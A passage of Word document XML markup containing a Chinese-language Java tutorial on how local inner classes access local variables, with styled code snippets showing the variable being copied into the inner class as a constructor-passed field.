      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                                System.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="859900"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.println(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2AA198"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"locvar = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + locvar);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                Object </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="859900"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="859900"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Inner();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="859900"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="859900"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="360" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="258" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>out.method()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>方法执行结束后，局部变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> locvar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>就消失了，但是在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>method</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>（）方法中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> obj in = new Inner() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>产生的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>对象还存在引用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>obj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，这样对象就访问了一个不存在的变量，是不允许的。这种矛盾是由局部内部类可以访问局部变量但是局部内部类对象和局部变量的生命周期不同而引起的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRDefault="00EF4FE3" w:rsidP="00E129CB">
      <w:r>
        <w:t>局部内部类访问局部变量的机制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="360" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="258" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>中，类是封装的，内部类也不例外。我们知道，非静态内部类能够访问外部类成员是因为它持有外部类对象的引用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Outer.this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>就像子类对像能够访问父类成员是持有父类对象引用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>super</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>一样。局部内部类也和一般内部类一样，只持有了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Outer.this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，能够访问外部类成员，但是它又是如何访问到局部变量的呢？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRDefault="00EF4FE3" w:rsidP="00E129CB">
      <w:r>
        <w:t>实际上</w:t>
      </w:r>
      <w:r>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:t>是将局部变量作为参数传给了局部内部类的构造函数，而将其作为内部类的成员属性封装在了类中。我们看到的内部类访问局部变量实际上只是访问了自己的成员属性而已，这和类的封装性是一致的。那么上面的代码实际上是这样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRPr="00E129CB" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="hljs-function"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Object </w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="hljs-title"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="268BD2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>method</w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="hljs-params"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRPr="00E129CB" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="859900"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> locvar = </w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2AA198"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRPr="00E129CB" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="859900"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="hljs-title"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="268BD2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Inner</w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRPr="00E129CB" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="859900"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="859900"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> obj;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4FE3" w:rsidRPr="00E129CB" w:rsidRDefault="00EF4FE3" w:rsidP="00EF4FE3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="859900"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="hljs-function"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="657B83"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E129CB">
        <w:rPr>
          <w:rStyle w:val="hljs-title"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="268BD2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Inner</w:t>
      </w:r>
